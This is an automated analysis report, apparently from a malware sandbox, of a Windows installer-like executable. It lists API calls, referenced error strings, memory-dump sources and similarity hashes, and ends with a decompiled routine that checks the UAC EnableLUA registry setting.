                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CertCertificateContextErrorLastProperty
                                                                                                                                                                  • String ID: certutil.cpp
                                                                                                                                                                  • API String ID: 980632616-2692845373
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,?,?,0041D9FB,00000000,?), ref: 0043847C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0041D9FB,00000000,?), ref: 0043848A
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,0041D9FB,00000000,?), ref: 004384C4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0041D9FB,00000000,?), ref: 004384CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConfigErrorHeapLastQueryService$AllocProcess
                                                                                                                                                                  • String ID: svcutil.cpp
                                                                                                                                                                  • API String ID: 36289606-1746323212
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004255EF: InternetCloseHandle.WININET(?), ref: 00425617
                                                                                                                                                                    • Part of subcall function 004255EF: InternetCloseHandle.WININET(00000000), ref: 00425627
                                                                                                                                                                    • Part of subcall function 004255EF: InternetConnectW.WININET(00000000,00000000,00000000,?,00000000,00000003,00000000,00000000), ref: 00425685
                                                                                                                                                                    • Part of subcall function 004255EF: lstrlenW.KERNEL32(?), ref: 004256AD
                                                                                                                                                                    • Part of subcall function 004255EF: InternetSetOptionW.WININET(00000000,0000002B,?,00000000), ref: 004256BE
                                                                                                                                                                    • Part of subcall function 004255EF: lstrlenW.KERNEL32(?), ref: 004256C5
                                                                                                                                                                    • Part of subcall function 004255EF: InternetSetOptionW.WININET(00000000,0000002C,?,00000000), ref: 004256D0
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000078,?,75C08550,HEAD,00000000,00000000,00000000,?,00000000), ref: 0042548D
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004254A0
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004254AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OptionTimelstrlen$ConnectFileSystem
                                                                                                                                                                  • String ID: Failed to connect to URL: %ls$HEAD
                                                                                                                                                                  • API String ID: 1677864904-290634988
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000001,00000000,0000000D,?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009), ref: 00437984
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?), ref: 00437990
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000001,00000001,00000000,?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?), ref: 004379CB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?), ref: 004379D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                  • API String ID: 152501406-2193988115
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                  • API String ID: 2001391462-1605196437
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405EA9
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format path string., xrefs: 00405EB4
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405F14
                                                                                                                                                                  • Failed to set variable., xrefs: 00405F00
                                                                                                                                                                  • Failed get file version., xrefs: 00405EE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                  • API String ID: 3613110473-2458530209
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,4000000B,00000000,?,00000000), ref: 0043861E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00438628
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 00438650
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043865A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastTime$FileHttpInfoQuerySystem
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 3487154604-2900720265
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000B8,00000000,00000000,00000000,00000000,00401414,00000000,00000000,00000000,?,0040F8A1), ref: 0040EF0F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate message to write., xrefs: 0040EEEE
                                                                                                                                                                  • Failed to write message type to pipe., xrefs: 0040EF51
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EF47
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                  • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 3934441357-1996674626
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EAE5
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EAF8
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EB13
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate memory for message., xrefs: 0040EACE
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EAC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s$Heap$AllocProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for message.$pipe.cpp
                                                                                                                                                                  • API String ID: 387492374-1914209504
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,004125F4,0000001A,00000000,?,00000000,00000000), ref: 00411FAA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004125F4,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00411FB4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCreateErrorKnownLastProcessWell
                                                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                                  • API String ID: 1343019080-2110050797
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ComputerErrorLastName
                                                                                                                                                                  • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 3560734967-484636765
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                  Strings
                                                                                                                                                                  • Condition, xrefs: 00405AC3
                                                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 00405B12
                                                                                                                                                                  • Failed to get Condition inner text., xrefs: 00405AF8
                                                                                                                                                                  • Failed to select condition node., xrefs: 00405ADF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                                                                                                                  • API String ID: 3341692771-3600577998
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 004027FB
                                                                                                                                                                    • Part of subcall function 00432058: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                    • Part of subcall function 00432058: GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                    • Part of subcall function 00432058: GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                    • Part of subcall function 004363EB: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00436418
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 0040285F
                                                                                                                                                                  • variable.cpp, xrefs: 00402825
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00402845
                                                                                                                                                                  • Failed to get shell folder., xrefs: 0040282F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2084161155-3906113122
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00403050
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040305A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 1238063741-2915113195
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32 ref: 004263AA
                                                                                                                                                                  • PeekMessageW.USER32 ref: 004263BF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00426589,?,?,?,00000001,00000000), ref: 004263C7
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed while waiting for download., xrefs: 004263F5
                                                                                                                                                                  • bitsengine.cpp, xrefs: 004263EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                                  • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                                  • API String ID: 435350009-228655868
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4,?,00000001,?,?,00419A4B,?,000001F4,?,?,?,?,?,?,?,?), ref: 00431FC6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00419A4B,?,000001F4,?,?,?,?,?,?,?,?), ref: 00431FD4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                  • API String ID: 1211598281-1178289305
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000001,00000080,00401414,00000001,000000FF,00000000,?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002), ref: 00436845
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001), ref: 0043684F
                                                                                                                                                                  • DeleteFileW.KERNEL32(00000001,00401414,00000001,000000FF,00000000,?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C), ref: 0043686E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001), ref: 00436878
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00426083
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004260C8
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?), ref: 004260DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get state during job modification., xrefs: 0042609C
                                                                                                                                                                  • Failure while sending progress during BITS job modification., xrefs: 004260B7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                  • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                  • API String ID: 3094578987-1258544340
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E6F
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E7A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E87
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create BITS job complete event., xrefs: 00425EB5
                                                                                                                                                                  • bitsengine.cpp, xrefs: 00425EAB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                  • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                  • API String ID: 3069647169-3441864216
                                                                                                                                                                  • Opcode ID: d2bd90b1625cbb4fecbd0c64ba04d8f84a28ddd82624711beb668f84de5ffee0
                                                                                                                                                                  • Instruction ID: 3df00e8a0922062b614be36183848c380a30c11a9f20d4e054128804f833d2d7
                                                                                                                                                                  • Opcode Fuzzy Hash: d2bd90b1625cbb4fecbd0c64ba04d8f84a28ddd82624711beb668f84de5ffee0
                                                                                                                                                                  • Instruction Fuzzy Hash: C0015272601622AFD3109F6AE805A87BBD8FF09761B114227FD08D7640E774D8108BEC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000D0,00000000,000000B8,00000000,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 00408691
                                                                                                                                                                  • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004086A0
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000D0,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 004086B5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Engine active cannot be changed because it was already in that state., xrefs: 004086D8
                                                                                                                                                                  • userexperience.cpp, xrefs: 004086CE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                  • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                  • API String ID: 3376869089-1544469594
                                                                                                                                                                  • Opcode ID: 7fe0521ee1da205aa0e302e094d209ab01fe134c1119def7c480392db85ccc0b
                                                                                                                                                                  • Instruction ID: 091642d989456ce679b1e30e11bc7159c76c977f9364c1853374bc69f863b0e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fe0521ee1da205aa0e302e094d209ab01fe134c1119def7c480392db85ccc0b
                                                                                                                                                                  • Instruction Fuzzy Hash: 57F028373003046B87109FA6AC84EA733BCEB99725701443FF641D3280DB34E8048778
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0043320D
                                                                                                                                                                  • GetLastError.KERNEL32(?,004015F0,00000001,00000000,?,?,?,?,00401E79,?,?,?), ref: 0043321C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                  • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                  • API String ID: 199729137-398595594
                                                                                                                                                                  • Opcode ID: 7edffb9465eb3a766c6251c0ab95df316e23b5577e0af73232a57825c1b2b81b
                                                                                                                                                                  • Instruction ID: 9391ebd7240fd7acb90a188370869bf68d339becc9c828c0075270ff4901721a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7edffb9465eb3a766c6251c0ab95df316e23b5577e0af73232a57825c1b2b81b
                                                                                                                                                                  • Instruction Fuzzy Hash: B1F04933A4833267E7226A696C0671775A0DF09757F1122B7FD00E6251D6ACCD00C5DE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001D2A0() {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = 4;
                                                                                                                                                                  				_v20 = 4;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                                  					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
                                                                                                                                                                  						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v16;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
